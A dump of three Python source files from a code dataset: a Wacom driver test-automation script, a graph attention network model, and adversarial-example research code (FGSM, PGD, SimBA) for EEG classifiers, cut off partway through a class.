i = 0\r\n    result = True\r\n    test_name = \"Process Check\"\r\n    proc_list = ['Wacom_Tablet.exe', 'Wacom_TabletUser.exe',\r\n                 'Wacom_TouchUser.exe', 'WTabletServicePro.exe', 'WacomHost.exe']\r\n    for name in proc_list:\r\n        res, pid, pstatus = FindProcess(name)\r\n        if not res:\r\n            result = False\r\n            i += 1\r\n            error[i] = name + \" \" + pstatus\r\n    results_map = AddTest(json_report, test_name, result, error)\r\n    return results_map\r\n\r\n\r\ndef FileTest(json_report):\r\n    error_map = dict()\r\n    missing_count = 0\r\n    test_name = \"File Check\"\r\n    result = True\r\n    with open(r'C:\\Wacomation\\resources\\FileList.json', 'r') as f:\r\n        file_map = json.load(f)\r\n    pkeylist = list(file_map.keys())\r\n    pkeylist.sort()\r\n    for p in pkeylist:\r\n        _path = file_map[p]['Path']\r\n        pcheck = os.path.exists(_path)\r\n        if not pcheck:\r\n            missing_count += 1\r\n            result = False\r\n            error_map.update([(missing_count, _path)])\r\n        else:\r\n            fkeylist = list(file_map[p]['ContainsFiles'].keys())\r\n            fkeylist.sort()\r\n            for f in fkeylist:\r\n                _file = file_map[p]['ContainsFiles'][f]['FileName']\r\n                f_path = _path + '\\\\' + _file\r\n                fcheck = os.path.exists(f_path)\r\n                # _size = file_map[p]['ContainsFiles'][f]['ByteSize']\r\n                if not fcheck:\r\n                    missing_count += 1\r\n                    error_map.update([(missing_count, f_path)])\r\n    results_map = AddTest(json_report, test_name, result, error_map)\r\n    return results_map\r\n\r\ndef InstallDriver():\r\n    driver = getMetaValue('driverName')\r\n    start = time.time()\r\n    process = subprocess.Popen([driver, \"/s\"])\r\n    while process.poll() is None:  # show elapsed install time while the installer runs\r\n        elapsed = time.time() - start\r\n        stdout.write(\"\\rInstalling. Elapsed time: %d seconds\" % elapsed)\r\n        stdout.flush()\r\n    _result = True\r\n    _error = None\r\n    if process.returncode != 0:  # If call return is 0 (no errors) makes new reg entry\r\n        _result = False\r\n        _error = process.returncode\r\n    return _result, _error\r\n\r\n\r\ndef UninstallDriver():\r\n    start = time.time()\r\n    path = r\"C:\\Program Files\\Tablet\\Wacom\\32\\Remove.exe\"\r\n    process = subprocess.Popen([path, \"/u\", \"/s\"], shell=True, cwd=r\"C:\\Program Files\\Tablet\\Wacom\\32\")\r\n    while process.poll() is None:\r\n        elapsed = time.time() - start\r\n        stdout.write(\"\\rUninstalling. 
Elapsed time: %d seconds\" % elapsed)\r\n stdout.flush()\r\n\r\n _result = True\r\n if process.returncode != 0: # If call return is 0 (no errors) makes new reg entry for next script then restarts\r\n _result = False\r\n rc = process.returncode\r\n else:\r\n rc = process.returncode\r\n return rc, _result\r\n\r\n\r\n\r\n\r\n\r\n# Experimenting with automated login\r\n# user = getpass.getuser()\r\n# print(\"The user name is %s\" % user)\r\n# user_name = os.getlogin()\r\n# print(\"The user_name is %s\" % user_name)\r\n# user2 = os.environ.get(\"USERNAME\")\r\n# print(user2)\r\n","repo_name":"snizzard/Wacomation","sub_path":"wac_functions.py","file_name":"wac_functions.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72594970027","text":"import torch\nimport torch.nn as nn\nimport dgl\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nfrom dgl import function as fn\nfrom dgl.ops import edge_softmax\nfrom dgl.utils import expand_as_pair\n\n\nclass HeteroGraphConv(nn.Module):\n def __init__(self, mods: dict):\n \"\"\"\n\n :param mods: input modules for graph learning\n :param relation_aggregate: aggregate manner node features generated by different relations\n \"\"\"\n super(HeteroGraphConv, self).__init__()\n self.mods = nn.ModuleDict(mods)\n\n def forward(self, graph: dgl.DGLHeteroGraph, input_src: dict, input_dst: dict, src_node_transformation: nn.ModuleDict,\n dst_node_transformation: nn.ModuleDict, src_node_attention: nn.ParameterDict, dst_node_attention: nn.ParameterDict):\n \"\"\"\n call the forward function with each module.\n\n Parameters\n ----------\n graph : DGLHeteroGraph\n The Heterogeneous Graph.\n input_src : dict[str, Tensor], Input source node features {'ntype': features}.\n input_dst : dict[str, Tensor], Input destination node features {'ntype': features}.\n src_node_transformation: nn.ModuleDict, weights {'ntype', (input_dim, hidden_dim * heads)}\n dst_node_transformation: nn.ModuleDict, weights {'ntype', (input_dim, hidden_dim * heads)}\n src_node_attention: nn.ParameterDict, weights {'ntype', (1, num_heads, out_size)}\n dst_node_attention: nn.ParameterDict, weights {'ntype', (1, num_heads, out_size)}\n\n Returns\n -------\n outputs, dict[str, Tensor]\n Output representations for each type of destination node -> {dtype: features}.\n \"\"\"\n\n # key: dsttype, value: list of representations\n outputs = defaultdict(list)\n\n for stype, etype, dtype in graph.canonical_etypes:\n rel_graph = graph[stype, etype, dtype]\n if rel_graph.number_of_edges() == 0:\n continue\n\n # shape (dst_nodes, hid_dim)\n outputs[dtype].append(self.mods[etype](rel_graph, (input_src[stype], input_dst[dtype]), src_node_transformation[stype], dst_node_transformation[dtype],\n src_node_attention[stype], dst_node_attention[dtype]).flatten(start_dim=1))\n\n output_features = {}\n for ntype in outputs:\n if len(outputs[ntype]) == 1:\n output_features[ntype] = outputs[ntype][0]\n else:\n output_features[ntype] = torch.mean(torch.stack(outputs[ntype], dim=0), dim=0)\n\n return output_features\n\n\nclass GATConv(nn.Module):\n def __init__(self, in_feats: int, out_feats: int, num_heads: int, feat_drop: float = 0.0, use_attn_dst: bool = True, use_symmetric_norm: bool = False):\n \"\"\"\n\n :param in_feats:\n :param out_feats:\n :param num_heads:\n :param feat_drop:\n :param use_attn_dst: whether calculate attention for destination node\n :param use_symmetric_norm: 
whether to use symmetric norm\n        \"\"\"\n        super(GATConv, self).__init__()\n        self._num_heads = num_heads\n        self._in_src_feats, self._in_dst_feats = expand_as_pair(in_feats)\n        self._out_feats = out_feats\n\n        self.feat_dropout = nn.Dropout(feat_drop)\n        self.leaky_relu = nn.LeakyReLU(negative_slope=0.2)\n\n        self.use_attn_dst = use_attn_dst\n        self._use_symmetric_norm = use_symmetric_norm\n\n    def forward(self, graph: dgl.DGLHeteroGraph, feat: torch.Tensor or tuple, src_node_transformation: nn.Module, dst_node_transformation: nn.Module,\n                src_node_attention: nn.Parameter, dst_node_attention: nn.Parameter):\n        \"\"\"\n        graph : The graph\n        feat : torch.Tensor or pair of torch.Tensor\n        src_node_transformation : nn.Parameter, trainable parameters for source node feature transformation\n        dst_node_transformation : nn.Parameter, trainable parameters for destination node feature transformation\n        src_node_attention : nn.Parameter, trainable attention vector for source node\n        dst_node_attention : nn.Parameter, trainable attention vector for destination node\n        \"\"\"\n\n        with graph.local_scope():\n            if isinstance(feat, tuple):\n                h_src = self.feat_dropout(feat[0])\n                h_dst = self.feat_dropout(feat[1])\n                feat_src = src_node_transformation(h_src).view(-1, self._num_heads, self._out_feats)\n                feat_dst = dst_node_transformation(h_dst).view(-1, self._num_heads, self._out_feats)\n            else:\n                h_src = h_dst = self.feat_dropout(feat)\n                feat_src = feat_dst = src_node_transformation(h_src).view(-1, self._num_heads, self._out_feats)\n                if graph.is_block:\n                    feat_dst = feat_src[:graph.number_of_dst_nodes()]\n\n            if self._use_symmetric_norm:\n                degs = graph.out_degrees().float().clamp(min=1)\n                norm = torch.pow(degs, -0.5)\n                shp = norm.shape + (1,) * (feat_src.dim() - 1)\n                norm = torch.reshape(norm, shp)\n                feat_src = feat_src * norm\n\n            el = (feat_src * src_node_attention).sum(dim=-1).unsqueeze(-1)\n            graph.srcdata.update({'ft': feat_src, 'el': el})\n\n            if self.use_attn_dst:\n                er = (feat_dst * dst_node_attention).sum(dim=-1).unsqueeze(-1)\n                graph.dstdata.update({'er': er})\n                # compute edge attention, el and er are a_l Wh_i and a_r Wh_j\n                graph.apply_edges(fn.u_add_v('el', 'er', 'e'))\n            else:\n                graph.apply_edges(fn.copy_u(\"el\", \"e\"))\n\n            e = self.leaky_relu(graph.edata.pop('e'))\n            graph.edata[\"a\"] = edge_softmax(graph, e)\n\n            # message passing\n            graph.update_all(fn.u_mul_e('ft', 'a', 'm'), fn.sum('m', 'ft'))\n            rst = graph.dstdata['ft']\n\n            if self._use_symmetric_norm:\n                degs = graph.in_degrees().float().clamp(min=1)\n                # norm = torch.pow(degs, -0.5)\n                norm = torch.pow(degs, 0.5)\n                shp = norm.shape + (1,) * (feat_dst.dim() - 1)\n                norm = torch.reshape(norm, shp)\n                rst = rst * norm\n\n            return rst\n\n\nclass LEGATLayer(nn.Module):\n    def __init__(self, in_size: int, out_size: int, etypes: list, ntypes: list, num_heads: int = 8, residual: bool = False, feat_drop: float = 0.0,\n                 output_drop: float = 0.0, use_attn_dst: bool = True, norm: bool = True, full_batch: bool = True, use_symmetric_norm: bool = False):\n        \"\"\"\n        :param in_size: input feature dimension\n        :param out_size: output feature dimension\n        :param etypes: list of relation types\n        :param ntypes: list of node types\n        :param num_heads: number of attention heads\n        :param residual: Boolean, whether to consider self information\n        :param feat_drop: Feature dropout probability\n        :param output_drop: Output dropout probability\n        :param use_attn_dst: whether to calculate attention for the destination node\n        :param norm: Boolean, whether to apply normalization\n        :param full_batch: Whether to train in a full-batch manner\n        :param use_symmetric_norm: whether to use symmetric norm\n        \"\"\"\n\n        super(LEGATLayer, self).__init__()\n\n        self.in_size = in_size\n        self.out_size = out_size\n        self.etypes = etypes\n        self.ntypes = ntypes\n        self.num_heads = num_heads\n        self.residual = residual\n        self.feat_drop = feat_drop\n        self.norm = norm\n        self.full_batch = full_batch\n        self.output_dropout = nn.Dropout(output_drop)\n\n        self.src_node_transformation = nn.ModuleDict({\n            ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n        })\n\n        self.dst_node_transformation = nn.ModuleDict({\n            ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n        })\n\n        self.src_node_attention = nn.ParameterDict({\n            ntype: nn.Parameter(torch.FloatTensor(size=(1, num_heads, out_size))) for ntype in ntypes\n        })\n\n        self.dst_node_attention = nn.ParameterDict({\n            ntype: nn.Parameter(torch.FloatTensor(size=(1, num_heads, out_size))) for ntype in ntypes\n        })\n\n        if self.residual:\n            # residual connection\n            self.res_fc = nn.ModuleDict({\n                ntype: nn.Linear(in_size, out_size * num_heads, bias=False) for ntype in ntypes\n            })\n\n        if self.norm:\n            self.normalization = nn.ModuleDict({\n                ntype: nn.BatchNorm1d(out_size * num_heads) for ntype in ntypes\n            })\n\n        self.hetero_conv = HeteroGraphConv({\n            etype: GATConv(in_feats=in_size, out_feats=out_size, num_heads=num_heads, feat_drop=feat_drop,\n                           use_attn_dst=use_attn_dst, use_symmetric_norm=use_symmetric_norm) for etype in etypes\n        })\n\n        self.reset_parameters()\n\n    def reset_parameters(self):\n        \"\"\"\n        Reinitialize learnable parameters.\n        \"\"\"\n        gain = nn.init.calculate_gain('relu')\n        for ntype in self.src_node_transformation:\n            nn.init.xavier_normal_(self.src_node_transformation[ntype].weight, gain=gain)\n        for ntype in self.dst_node_transformation:\n            nn.init.xavier_normal_(self.dst_node_transformation[ntype].weight, gain=gain)\n        for weight in self.src_node_attention:\n            nn.init.xavier_normal_(self.src_node_attention[weight], gain=gain)\n        for weight in self.dst_node_attention:\n            nn.init.xavier_normal_(self.dst_node_attention[weight], gain=gain)\n        if self.residual:\n            for ntype in self.res_fc:\n                nn.init.xavier_uniform_(self.res_fc[ntype].weight, gain=gain)\n\n    def forward(self, graph: dgl.DGLGraph, node_features: dict):\n        \"\"\"\n        :param graph: a graph\n        :param node_features: tensor, Input features, (N, in_size)\n        :return: (N, num_heads * out_size)\n        \"\"\"\n        # dictionary of input source features and destination features\n        input_src = node_features\n\n        if self.full_batch:\n            input_dst = node_features\n        else:\n            input_dst = {}\n            for ntype in node_features:\n                input_dst[ntype] = node_features[ntype][:graph.number_of_dst_nodes(ntype)]\n\n        output_features = self.hetero_conv(graph, input_src, input_dst, self.src_node_transformation, self.dst_node_transformation,\n                                           self.src_node_attention, self.dst_node_attention)\n\n        if self.residual:\n            for ntype in output_features:\n                output_features[ntype] = output_features[ntype] + self.res_fc[ntype](input_dst[ntype])\n\n        if self.norm:\n            for ntype in output_features:\n                output_features[ntype] = self.normalization[ntype](output_features[ntype])\n\n        for ntype in output_features:\n            output_features[ntype] = self.output_dropout(F.relu(output_features[ntype]))\n\n        # Tensor, shape (N, out_size * num_heads)\n        return output_features\n\n\nclass LEGAT(nn.Module):\n    def __init__(self, input_dim_dict: dict, hidden_sizes: list, etypes: list, ntypes: list, num_heads: int = 8, residual: bool = False, input_drop: float = 0.0,\n                 feat_drop: float = 0.0, output_drop: float = 0.0, use_attn_dst: bool = True, norm: bool = True, use_symmetric_norm: bool = False, full_batch: bool = True):\n        \"\"\"\n        :param input_dim_dict: dict, input dim dictionary\n        :param hidden_sizes: list, hidden feature dimension of each layer\n        :param etypes: list of relation types\n        :param ntypes: list of node types\n        :param num_heads: int, number of attention heads\n        :param residual: Boolean, whether to consider self information\n        :param input_drop: Input dropout probability\n        :param feat_drop: Feature dropout probability\n        :param output_drop: Dropout probability\n        :param use_attn_dst: whether to calculate attention for the destination node\n        :param norm: Boolean, whether to apply normalization\n        :param full_batch: Whether to train in a full-batch manner\n        :param use_symmetric_norm: whether to use symmetric norm\n        \"\"\"\n\n        super(LEGAT, self).__init__()\n\n        self.input_dim_dict = input_dim_dict\n        self.hidden_sizes = hidden_sizes\n        self.etypes = etypes\n        self.ntypes = ntypes\n        self.num_heads = num_heads\n        self.residual = residual\n        self.feat_drop = feat_drop\n        self.output_drop = output_drop\n        self.norm = norm\n        self.full_batch = full_batch\n\n        self.input_dropout = nn.Dropout(input_drop)\n\n        # align the dimension of different types of nodes\n        self.projection_layer = nn.ModuleDict({\n            ntype: nn.Linear(input_dim_dict[ntype], hidden_sizes[0] * num_heads, bias=False) for ntype in input_dim_dict\n        })\n\n        # each layer takes in the heterogeneous graph as input\n        self.layers = nn.ModuleList()\n        self.layers.append(LEGATLayer(hidden_sizes[0] * num_heads, hidden_sizes[0], etypes=etypes, ntypes=ntypes, num_heads=num_heads, residual=residual,\n                                      feat_drop=feat_drop, output_drop=output_drop, use_attn_dst=use_attn_dst, norm=norm, full_batch=full_batch, use_symmetric_norm=use_symmetric_norm))\n\n        for l in range(1, len(hidden_sizes)):\n            self.layers.append(LEGATLayer(hidden_sizes[l-1] * num_heads, hidden_sizes[l], etypes=etypes, ntypes=ntypes, num_heads=num_heads, residual=residual,\n                                          feat_drop=feat_drop, output_drop=output_drop, use_attn_dst=use_attn_dst, norm=norm, full_batch=full_batch, use_symmetric_norm=use_symmetric_norm))\n\n    def forward(self, blocks: list or dgl.DGLHeteroGraph, node_features: dict):\n        \"\"\"\n        :param blocks: list of sampled dgl.DGLHeteroGraph\n        :param node_features: node features, dict, {\"type\": features}\n        :return:\n        \"\"\"\n        # feature projection\n        for ntype in node_features:\n            node_features[ntype] = self.projection_layer[ntype](self.input_dropout(node_features[ntype]))\n\n        if self.full_batch:\n            for layer in self.layers:\n                node_features = layer(blocks, node_features)\n        else:\n            for block, layer in zip(blocks, self.layers):\n                node_features = layer(block, node_features)\n\n        return node_features\n\n    def inference(self, graph: dgl.DGLHeteroGraph, node_features: dict, device: str):\n        \"\"\"\n        mini-batch inference of final representation over all node types. 
Outer loop: Iterate the layers, Inner loop: Iterate the batches\n\n        :param graph: The whole relational graph\n        :param node_features: features of all the nodes in the whole graph, dict, {\"type\": features}\n        :param device: device str\n        \"\"\"\n        with torch.no_grad():\n            # iterate over each layer\n            for index, layer in enumerate(self.layers):\n                # Tensor, features of all types of nodes, store on cpu\n                y = {\n                    ntype: torch.zeros(\n                        graph.number_of_nodes(ntype), self.num_heads * self.hidden_sizes[index]) for ntype in graph.ntypes\n                }\n                # full sample for each type of nodes\n                sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)\n                dataloader = dgl.dataloading.NodeDataLoader(\n                    graph,\n                    {ntype: torch.arange(graph.number_of_nodes(ntype)) for ntype in graph.ntypes},\n                    sampler,\n                    batch_size=1280,\n                    shuffle=True,\n                    drop_last=False,\n                    num_workers=4)\n\n                tqdm_dataloader = tqdm(dataloader, ncols=120)\n                for batch, (input_nodes, output_nodes, blocks) in enumerate(tqdm_dataloader):\n                    block = blocks[0].to(device)\n\n                    input_features = {ntype: node_features[ntype][input_nodes[ntype]].to(device) for ntype in input_nodes.keys()}\n\n                    if index == 0:\n                        # input drop and feature projection for the first layer in the full batch inference\n                        for ntype in input_features:\n                            input_features[ntype] = self.projection_layer[ntype](self.input_dropout(input_features[ntype]))\n\n                    h = layer(block, input_features)\n\n                    for k in h.keys():\n                        y[k][output_nodes[k]] = h[k].cpu()\n\n                    tqdm_dataloader.set_description(f'inference for the {batch}-th batch in model {index}-th layer')\n\n                # update the features of all the nodes (after the graph convolution) in the whole graph\n                node_features = y\n\n        return y\n","repo_name":"yule-BUAA/LEGNN","sub_path":"model/LEGNN.py","file_name":"LEGNN.py","file_ext":"py","file_size_in_byte":17055,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"28803108633","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom typing import Optional\nfrom model import EEGNet\nfrom utils.pytorch_utils import init_weights, CenterLoss\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom utils.ot import sinkhorn_loss_joint_IPOT\n\n\ndef FGSM(model: nn.Module,\n         x: torch.Tensor,\n         y: torch.Tensor,\n         eps: Optional[float] = 0.05,\n         distance: Optional[str] = 'inf',\n         target: Optional[bool] = False):\n    \"\"\" FGSM attack \"\"\"\n    device = next(model.parameters()).device\n    criterion = nn.CrossEntropyLoss().to(device)\n\n    data_loader = DataLoader(dataset=TensorDataset(x, y),\n                             batch_size=128,\n                             shuffle=False,\n                             num_workers=1,\n                             drop_last=False)\n\n    model.eval()\n    for step, (batch_x, batch_y) in enumerate(data_loader):\n        batch_x = batch_x.clone().detach().to(device)\n        batch_y = batch_y.clone().detach().to(device)\n        batch_x.requires_grad = True\n\n        with torch.enable_grad():\n            loss = criterion(model(batch_x), batch_y)\n        grad = torch.autograd.grad(loss,\n                                   batch_x,\n                                   retain_graph=False,\n                                   create_graph=False)[0]\n\n        if distance == 'inf':\n            delta = grad.detach().sign()\n        elif distance == 'l2':\n            grad_norms = torch.norm(\n                grad.detach().view(len(batch_x), -1), p=2, dim=1) + 1e-10\n            # factor = torch.min(eps / grad_norms, torch.ones_like(grad_norms))\n            delta = grad.detach() / grad_norms.view(-1, 1, 1, 1)\n        else:\n            raise ValueError('No such distance.')\n\n        if target:\n            batch_adv_x = batch_x.detach() - eps * delta\n        else:\n            batch_adv_x = batch_x.detach() + eps * delta\n\n        if step == 0: adv_x = batch_adv_x\n        else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n    return adv_x\n\n\ndef PGD(model: nn.Module,\n        x: torch.Tensor,\n        y: torch.Tensor,\n        eps: Optional[float] = 0.05,\n        alpha: Optional[float] = 0.005,\n        steps: Optional[int] = 20,\n        distance: Optional[str] = 'inf',\n        target: Optional[bool] = False):\n    \"\"\" PGD attack \"\"\"\n    device = next(model.parameters()).device\n    criterion = nn.CrossEntropyLoss().to(device)\n\n    data_loader = DataLoader(dataset=TensorDataset(x, y),\n                             batch_size=128,\n                             shuffle=False,\n                             drop_last=False)\n\n    model.eval()\n    for step, (batch_x, batch_y) in enumerate(data_loader):\n        batch_x = batch_x.clone().detach().to(device)\n        batch_y = batch_y.clone().detach().to(device)\n\n        # craft adversarial examples\n        batch_adv_x = batch_x.clone().detach() + torch.empty_like(\n            batch_x).uniform_(-eps, eps)\n        for _ in range(steps):\n            batch_adv_x.requires_grad = True\n            with torch.enable_grad():\n                loss = criterion(model(batch_adv_x), batch_y)\n            grad = torch.autograd.grad(loss,\n                                       batch_adv_x,\n                                       retain_graph=False,\n                                       create_graph=False)[0]\n\n            if distance == 'inf':\n                delta = grad.detach().sign()\n            elif distance == 'l2':\n                grad_norms = torch.norm(\n                    grad.detach().view(len(batch_x), -1), p=2, dim=1) + 1e-10\n                delta = grad.detach() / grad_norms.view(-1, 1, 1, 1)\n            else:\n                raise ValueError('No such distance')\n\n            if target:\n                batch_adv_x = batch_adv_x.detach() - alpha * delta\n            else:\n                batch_adv_x = batch_adv_x.detach() + alpha * delta\n\n            # projection\n            if distance == 'inf':\n                delta = torch.clamp(batch_adv_x - batch_x, min=-eps, max=eps)\n            else:\n                delta = batch_adv_x - batch_x\n                delta_norms = torch.norm(delta.view(len(batch_x), -1),\n                                         p=2,\n                                         dim=1)\n                factor = torch.min(eps / delta_norms,\n                                   torch.ones_like(delta_norms))\n                delta = delta * factor.view(-1, 1, 1, 1)\n\n            batch_adv_x = (batch_x + delta).detach()\n\n        if step == 0: adv_x = batch_adv_x\n        else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n    return adv_x\n\n\ndef PGD_batch(model: nn.Module,\n              x: torch.Tensor,\n              y: torch.Tensor,\n              eps: Optional[float] = 0.05,\n              alpha: Optional[float] = 0.005,\n              steps: Optional[int] = 20):\n    \"\"\" PGD attack \"\"\"\n    device = next(model.parameters()).device\n    criterion = nn.CrossEntropyLoss().to(device)\n\n    model.eval()\n    x = x.clone().detach().to(device)\n    y = y.clone().detach().to(device)\n\n    # craft adversarial examples\n    adv_x = x.clone().detach() + torch.empty_like(x).uniform_(-eps, eps)\n    for _ in range(steps):\n        adv_x.requires_grad = True\n        with torch.enable_grad():\n            loss = criterion(model(adv_x), y)\n        grad = torch.autograd.grad(loss,\n                                   adv_x,\n                                   retain_graph=False,\n                                   create_graph=False)[0]\n        adv_x = adv_x.detach() + alpha * grad.detach().sign()\n        # projection\n        delta = torch.clamp(adv_x - x, min=-eps, max=eps)\n        adv_x = (x + delta).detach()\n\n    return adv_x\n\n\ndef maximize_shift_inconsistency(model: nn.Module,\n                                 batch_adv_x: torch.Tensor,\n                                 x: torch.Tensor,\n                                 y: torch.Tensor,\n                                 criterion: nn.Module,\n                                 eps: Optional[float] = 0.05,\n                                 alpha: Optional[float] = 0.005,\n                                 steps: Optional[int] = 20):\n    device = next(model.parameters()).device\n\n    model.eval()\n    batch_adv_x = batch_adv_x.clone().detach().to(device)\n    x = x.clone().detach().to(device)\n    y = y.clone().detach().to(device)\n    for _ in range(steps):\n        batch_adv_x.requires_grad = True\n        with torch.enable_grad():\n            loss = criterion(model(batch_adv_x) - model(x), y)\n        grad = torch.autograd.grad(loss,\n                                   batch_adv_x,\n                                   retain_graph=False,\n                                   create_graph=False)[0]\n        batch_adv_x = batch_adv_x.detach() + 0.4 * alpha * 
grad.detach().sign()\n # projection\n delta = torch.clamp(batch_adv_x - x, min=-eps, max=eps)\n batch_adv_x = (x + delta).detach()\n \n return batch_adv_x\n\n\ndef feature_scatter(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n eps: Optional[float] = 0.05,\n alpha: Optional[float] = 0.005,\n steps: Optional[int] = 20):\n device = next(model.parameters()).device\n\n model.eval()\n x = x.clone().detach().to(device)\n y = y.clone().detach().to(device)\n\n logits = model(x)\n m, n = len(x), len(x)\n\n # craft adversarial examples\n adv_x = x.clone().detach() + torch.empty_like(x).uniform_(-eps, eps)\n for _ in range(steps):\n adv_x.requires_grad = True\n adv_logits = model(adv_x)\n with torch.enable_grad():\n loss = sinkhorn_loss_joint_IPOT(1, 0.00, logits,\n adv_logits, None, None,\n 0.01, m, n)\n grad = torch.autograd.grad(loss,\n adv_x,\n retain_graph=False,\n create_graph=False)[0]\n adv_x = adv_x.detach() + alpha * grad.detach().sign()\n # projection\n delta = torch.clamp(adv_x - x, min=-eps, max=eps)\n adv_x = (x + delta).detach()\n \n return adv_x\n\n\ndef get_preds(model: nn.Module, x: torch.Tensor):\n logits = model(x)\n preds = nn.Softmax(dim=1)(logits).argmax(dim=1)\n return preds\n\n\ndef get_probs(model: nn.Module, x: torch.Tensor, y: torch.Tensor):\n logits = model(x)\n probs = torch.index_select(nn.Softmax(dim=1)(logits),\n dim=1,\n index=y.squeeze())\n return torch.diag(probs)\n\n\ndef SimBA(model: nn.Module,\n x: torch.Tensor,\n y: torch.Tensor,\n max_iters: Optional[float] = 0.5,\n eps=0.05,\n distance='inf',\n target=False):\n \"\"\" simple black attack \"\"\"\n device = next(model.parameters()).device\n\n if distance == 'inf': alpha = eps\n else: alpha = 0.05\n\n data_loader = DataLoader(dataset=TensorDataset(x, y),\n batch_size=128,\n shuffle=False,\n num_workers=1,\n drop_last=False)\n\n for step, (batch_x, batch_y) in enumerate(data_loader):\n batch_x = batch_x.clone().detach().to(device)\n batch_y = batch_y.clone().detach().to(device)\n\n shape = batch_x.shape\n n_dims = shape[-2] * shape[-1]\n iters = int(max_iters * n_dims)\n\n perm_idx_list = torch.randperm(n_dims)[:iters].to(device)\n perm = torch.zeros(shape[0], n_dims).to(device)\n queries = torch.zeros(shape[0]).to(device)\n remaining_idx = torch.arange(0, shape[0]).to(device)\n\n batch_x = batch_x.reshape(shape[0], -1)\n\n with torch.no_grad():\n preds = get_preds(model, batch_x.reshape(shape))\n probs = get_probs(model, batch_x.reshape(shape), batch_y)\n\n for i in tqdm(range(iters)):\n perm_idx = perm_idx_list[i]\n perm_x = batch_x[remaining_idx] + perm[remaining_idx]\n preds[remaining_idx] = get_preds(\n model, perm_x.reshape((len(perm_x), *shape[1:])))\n\n if target:\n remaining = ~preds.eq(batch_y.view_as(preds))\n else:\n remaining = preds.eq(batch_y.view_as(preds))\n\n # if all inputs are misclassified\n if remaining.sum() == 0: break\n\n remaining_idx = torch.arange(0, shape[0]).to(device)\n remaining_idx = remaining_idx[remaining]\n one_step_perm = torch.zeros(remaining.sum(), n_dims).to(device)\n one_step_perm[:, perm_idx] = alpha\n # training negative direction\n perm[remaining_idx] -= one_step_perm\n perm_x = batch_x[remaining_idx] + perm[remaining_idx]\n new_probs = get_probs(\n model,\n perm_x.reshape((len(perm_x), *shape[1:])).to(device),\n batch_y[remaining_idx])\n queries[remaining_idx] += 1\n effective = new_probs.lt(probs[remaining_idx])\n # perturb on positive direction if not effective\n if target:\n perm[remaining_idx[\n effective]] += 2 * one_step_perm[effective]\n 
perm_x[effective] += 2 * one_step_perm[effective]\n            else:\n                perm[remaining_idx[\n                    ~effective]] += 2 * one_step_perm[~effective]\n                perm_x[~effective] += 2 * one_step_perm[~effective]\n            # update probs\n            probs[remaining_idx] = get_probs(\n                model,\n                perm_x.reshape((len(perm_x), *shape[1:])).to(device),\n                batch_y[remaining_idx])\n\n        if distance == 'l2':\n            perm_norms = torch.norm(perm.view(len(perm), -1), p=2, dim=1) + 1e-10\n            perm = (perm / perm_norms.view(-1, 1)) * eps\n\n        batch_adv_x = (batch_x + perm).reshape(shape)\n\n        if step == 0: adv_x = batch_adv_x\n        else: adv_x = torch.cat([adv_x, batch_adv_x], dim=0)\n\n    return adv_x.cpu(), queries.cpu()\n\n\ndef get_pred(model: nn.Module, x: torch.Tensor):\n    device = next(model.parameters()).device\n    pred_x = torch.ones(size=(len(x), 1)).squeeze().type(torch.LongTensor)\n    train_loader = DataLoader(dataset=TensorDataset(x, pred_x),\n                              batch_size=32,\n                              shuffle=False,\n                              num_workers=1,\n                              drop_last=False)\n\n    idx = 0\n    for batch_x, _ in train_loader:\n        sub_pred = model(batch_x.to(device))\n        sub_pred = nn.Softmax(dim=1)(sub_pred).cpu().argmax(dim=1)\n        pred_x[idx:idx + len(sub_pred)] = sub_pred.type(torch.LongTensor)\n        idx += len(sub_pred)\n\n    return pred_x\n\n\ndef TrainSub(model: nn.Module, x_sub: torch.Tensor, y_sub: torch.Tensor,\n             aug_repeat: int):\n    device = next(model.parameters()).device\n    sub_model = EEGNet(n_classes=len(np.unique(y_sub.numpy())),\n                       Chans=x_sub.shape[2],\n                       Samples=x_sub.shape[3],\n                       kernLenght=64,\n                       F1=4,\n                       D=2,\n                       F2=8,\n                       dropoutRate=0.25).to(device)\n    sub_model.apply(init_weights)\n\n    params = [v for _, v in sub_model.named_parameters()]\n    optimizer = optim.Adam(params, lr=0.001, weight_decay=5e-4)\n    criterion = nn.CrossEntropyLoss().to(device)\n\n    # initial dataset\n    model.eval()\n    y_sub = get_pred(model, x_sub)\n\n    for r in range(aug_repeat):\n        train_loader = DataLoader(dataset=TensorDataset(x_sub, y_sub),\n                                  batch_size=32,\n                                  shuffle=True,\n                                  num_workers=1,\n                                  drop_last=False)\n        for epoch in range(100):\n            sub_model.train()\n            for step, (batch_x, batch_y) in enumerate(train_loader):\n                batch_x, batch_y = batch_x.to(device), batch_y.to(device)\n                optimizer.zero_grad()\n                logit = sub_model(batch_x)\n                loss = criterion(logit, batch_y)\n                loss.backward()\n                optimizer.step()\n                sub_model.MaxNormConstraint()\n\n        # augment the sample set with adversarial examples\n        if r < aug_repeat - 1:\n            adv_x = FGSM(sub_model, x_sub, y_sub, eps=0.05)\n            adv_y = get_pred(model, adv_x.cpu())\n            x_sub = torch.cat([x_sub, adv_x.cpu()], dim=0)\n            y_sub = torch.cat([y_sub, adv_y.type(torch.LongTensor)], dim=0)\n            del adv_x, adv_y\n\n    return sub_model\n\n\nclass RayS(object):\n    def __init__(self, model, epsilon=0.031, order=np.inf):\n        self.model = model\n        self.ord = order\n        self.epsilon = epsilon\n        self.sgn_t = None\n        self.d_t = None\n        self.x_final = None\n        self.queries = None\n        self.device = next(model.parameters()).device\n\n    def get_xadv(self, x, v, d, lb=0., ub=1.):\n        if isinstance(d, int):\n            d = torch.tensor(d).repeat(len(x)).to(self.device)\n        out = x + d.view(len(x), 1, 1, 1) * v\n        out = torch.clamp(out, lb, ub)\n        return out\n\n  